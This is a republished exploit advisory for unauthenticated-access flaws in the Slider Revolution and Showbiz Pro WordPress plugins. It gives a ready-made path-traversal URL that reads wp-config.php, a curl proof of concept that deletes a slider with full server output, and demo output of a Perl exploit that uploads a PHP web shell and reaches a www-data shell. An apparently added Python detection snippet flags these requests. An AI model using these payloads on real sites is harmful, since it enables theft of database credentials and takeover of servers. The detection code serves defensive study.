Any read:
/wp-admin/admin-ajax.php?action=revslider_show_image&img=…/wp-config.php
Any upload:
#!/usr/bin/perl
Title: Slider Revolution/Showbiz Pro shell upload exploit
Author: Simo Ben youssef
Contact: Simo_at_Morxploit_com
Discovered: 15 October 2014
Coded: 15 October 2014
Updated: 25 November 2014
Published: 25 November 2014
MorXploit Research
Vendor: ThemePunch
Software: Revslider/Showbiz Pro
Versions: <= 3.0.95 (Revslider) / Version: <= 1.7.1 (Showbiz Pro)
Products url:
Vulnerable scripts:
revslider/revslider_admin.php
showbiz/showbiz_admin.php
About the plugins:
The #1 slider plugin, used by millions, Slider Revolution is an all-purpose slide displaying solution that allows for showing almost any kind of content with highly customizable transitions, effects and custom animations.
Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set amount of teaser items.
Description:
Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php, allowing an unauthenticated attacker to abuse administrative features.
Some of the features include:
Creating/Deleting/Updating sliders
Importing/exporting sliders
Updating plugin
For a full list of functions please see revslider_admin.php/showbiz_admin.php
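As an added example (not part of this advisory or the plugin's code), a request-level check that a WAF or reverse proxy could apply for the two abuses described here: the revslider_show_image file read and revslider_ajax_action calls made without a session. It assumes each request is handed over as a dict holding the raw query string, body and Cookie header, uses the presence of a wordpress_logged_in_ cookie as a heuristic for an authenticated WordPress session, and the request records are constructed.

```python
from urllib.parse import parse_qs

# Constructed request records (not from the advisory); "cookies" is the raw Cookie header.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/wp-admin/admin-ajax.php",
     "query": "action=revslider_show_image&img=../wp-config.php", "body": "", "cookies": ""},
    {"method": "POST", "path": "/wp-admin/admin-ajax.php", "query": "",
     "body": "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1",
     "cookies": "PHPSESSID=abc"},
    {"method": "GET", "path": "/wp-admin/admin-ajax.php",
     "query": "action=revslider_show_image&img=slide1.jpg", "body": "", "cookies": ""},
    {"method": "POST", "path": "/wp-admin/admin-ajax.php", "query": "",
     "body": "action=revslider_ajax_action&client_action=export_slider&sliderid=2",
     "cookies": "wordpress_logged_in_1a2b=admin%7C1414194000%7Cxyz"},
]

IMAGE_EXTENSIONS = (".jpg", ".jpeg", ".png", ".gif")
# client_action values the advisory names as the most damaging ones.
HIGH_RISK_CLIENT_ACTIONS = {"delete_slider", "update_plugin"}


def inspect_request(req):
    """Return a list of (severity, reason) findings for one admin-ajax request."""
    if not req["path"].endswith("/wp-admin/admin-ajax.php"):
        return []
    params = parse_qs(req["query"])
    params.update(parse_qs(req["body"]))
    action = params.get("action", [""])[0]
    findings = []
    if action == "revslider_show_image":
        img = params.get("img", [""])[0]
        # The image handler expects a file name; traversal, an absolute path or a
        # non-image target means it is being used as an arbitrary file read.
        if ".." in img or img.startswith("/") or not img.lower().endswith(IMAGE_EXTENSIONS):
            findings.append(("high", f"revslider_show_image used to read {img!r}"))
    elif action == "revslider_ajax_action":
        client_action = params.get("client_action", [""])[0]
        # Heuristic (assumption): WordPress sets a wordpress_logged_in_* cookie for
        # logged-in users, so an admin action without one is the abuse described above.
        if "wordpress_logged_in_" not in req["cookies"]:
            sev = "high" if client_action in HIGH_RISK_CLIENT_ACTIONS else "medium"
            findings.append((sev, f"unauthenticated revslider_ajax_action client_action={client_action!r}"))
    return findings


def scan(requests):
    """Run inspect_request over a batch and pair each finding with its request index."""
    return [(i, f) for i, req in enumerate(requests) for f in inspect_request(req)]
```

Legitimate image requests and calls carrying a logged-in cookie produce no findings; the check is a detection aid, and the fix remains updating the plugin to a version that enforces the authentication check.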
PoC on revslider:
1 - Deleting a slider:
root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1" http://****.com/wp-admin/admin-ajax.php
* Connected to ****.com (...) port 80 (#0)
> POST /wp-admin/admin-ajax.php HTTP/1.1
> User-Agent: curl/7.35.0
> Host: ****.com
> Accept: */*
> Content-Length: 73
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 73 out of 73 bytes
< HTTP/1.1 200 OK
< Date: Fri, 24 Oct 2014 23:25:07 GMT
* Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
< Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
< X-Powered-By: PHP/5.4.18
< X-Robots-Tag: noindex
< X-Content-Type-Options: nosniff
< Expires: Mon, 11 Jan 1984 05:00:00 GMT
< Cache-Control: no-cache, must-revalidate, max-age=0
< Pragma: no-cache
< X-Frame-Options: SAMEORIGIN
< Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host http://****.com left intact
{"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http://****.com/wp-admin/admin.php?page=revslider&view=sliders"}
2 - Uploading a web shell:
The following Perl exploit will try to upload a PHP shell through the update_plugin function.
To use the exploit, first download the revslider.zip and showbiz.zip files, which contain cmd.php,
and save them in the same directory as the exploit.
Demo:
===================================================
— Revslider/Showbiz shell upload exploit
— By: Simo Ben youssef <simo_at_morxploit_com>
===================================================
[*] Target set to revslider
[*] Sent payload
[+] Payload successfully executed
[*] Checking if shell was uploaded
[+] Shell successfully uploaded
Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@MorXploit:~$
Download:
Exploit:
Exploit update zip files:
Requires LWP::UserAgent
apt-get install libwww-perl
yum install libwww-perl